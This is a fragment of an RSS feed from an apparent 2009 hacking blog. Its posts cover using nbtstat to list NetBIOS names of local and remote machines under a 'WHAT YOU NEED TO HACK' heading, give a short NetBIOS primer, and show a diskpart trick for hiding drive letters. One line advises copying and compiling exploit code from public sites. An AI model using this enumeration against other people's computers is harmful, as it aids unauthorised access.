MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt; &lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.&lt;/span&gt;&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>THE NBTSTAT COMMAND</title><link>http://hackingwithme.blogspot.com/2009/03/nbtstat-command.html</link><category>Remote access</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Mon, 30 Mar 2009 11:51:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-1250072959205175065</guid><description>&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Now lets play with the NBTSTAT command.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;nbtstat/?&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;If you want to get the NetBIOS information of your computer type the following command&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;nbtstat -a 127.0.0.1&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;This command will list the NetBIOS information. A typical example&lt;/span&gt;&lt;span style="font-size:10.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;NetBIOS Remote Machine Name Table&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Name Number Type Usage&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;workgroup 00 G Domain Name&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;my_computer 03 U Messenger Service&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;myusername 03 U Messenger Service&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;MAC Address = 00-02-44-14-23-E6&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;If you want to get the NetBIOS names of a remote computer, the command is&lt;/span&gt;&lt;span style="font-size:10.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;nbtstat -a ipaddress&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family: &amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.&lt;/span&gt;&lt;span style="font-size:10.0pt; line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F; mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;c:\windows&gt;nbtstat -a 203.195.136.156&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;WHAT YOU NEED TO HACK&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height:115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-ansi-language:EN-US;mso-fareast-language:EN-US;mso-bidi-language: TH"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:10.0pt;mso-bidi-font-size:11.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.&lt;/span&gt;&lt;span style="font-size:10.0pt;line-height: 115%;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;&lt;br /&gt; &lt;br /&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>A BRIEF LESSON ON NETBIOS</title><link>http://hackingwithme.blogspot.com/2009/03/brief-lesson-on-netbios.html</link><category>Remote access</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Mon, 30 Mar 2009 11:49:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-7836313776958404261</guid><description>&lt;span style="font-size:10.0pt;line-height:115%; font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;;mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;; mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;;color:#63565F;mso-ansi-language:EN-US; mso-fareast-language:EN-US;mso-bidi-language:TH"&gt;NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-&lt;br /&gt;&lt;br /&gt;Name of the computer&lt;br /&gt;&lt;br /&gt;Username&lt;br /&gt;&lt;br /&gt;Domain&lt;br /&gt;&lt;br /&gt;Computer Name&lt;br /&gt;&lt;br /&gt;and many others.&lt;br /&gt;&lt;br /&gt;Like any other service it also works on a port . It has been assigned a port number 139.&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hide disk drives without any software</title><link>http://hackingwithme.blogspot.com/2009/03/hide-disk-drives-without-any-software.html</link><category>Windows</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Mon, 30 Mar 2009 11:25:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-8050687450634237632</guid><description>&lt;p class="MsoNormal" style="margin-top:5.0pt;margin-right:0in;margin-bottom:5.0pt; margin-left:0in;line-height:normal"&gt;&lt;span class="Apple-style-span"   style="font-family:'Times New Roman';color:#63565F;"&gt;&lt;/span&gt;&lt;/p&gt;&lt;span class="Apple-style-span"   style="font-family:'Times New Roman';color:#63565F;"&gt;&lt;p class="MsoNormal" style="margin-top: 5pt; margin-right: 0in; margin-bottom: 5pt; margin-left: 0in; "&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; line-height:16.8pt"&gt;&lt;span style="font-size:10.0pt;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-bidi-language:TH"&gt;Here is a cool technique which hides entire hard disk drives by a simple procedure.&lt;br /&gt;This is the best security tip to be employ against unauthorised users.&lt;br /&gt;&lt;br /&gt;1) Go to Start &gt; Run &gt; type "diskpart".&lt;br /&gt;A DOS window will appear with following description.&lt;br /&gt;&lt;br /&gt;DISKPART&gt;&lt;br /&gt;&lt;br /&gt;2) Then type "list volume"&lt;br /&gt;The result will look something like one as shown below-&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; line-height:16.8pt"&gt;&lt;span style="font-size:10.0pt;font-family:&amp;quot;Trebuchet MS&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; color:#63565F;mso-bidi-language:TH"&gt;3) Suppose you want to hide drive E then type "select volume 3"&lt;br /&gt;Then a message will appear in same window { Volume 3 is the selected volume}&lt;br /&gt;&lt;br /&gt;4) Now type "remove letter E"&lt;br /&gt;Now a message will come { Diskpart Removed the Drive letter }&lt;br /&gt;&lt;br /&gt;sometime it requires to reboot the computer.&lt;br /&gt;Diskpart will remove the letter.&lt;br /&gt;&lt;br /&gt;Windows XP is not having capabilty to identify the unknown volume.&lt;br /&gt;Your Data is now safe from unauthorised users.&lt;br /&gt;&lt;br /&gt;To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".&lt;br /&gt;It means type "assign letter E".&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>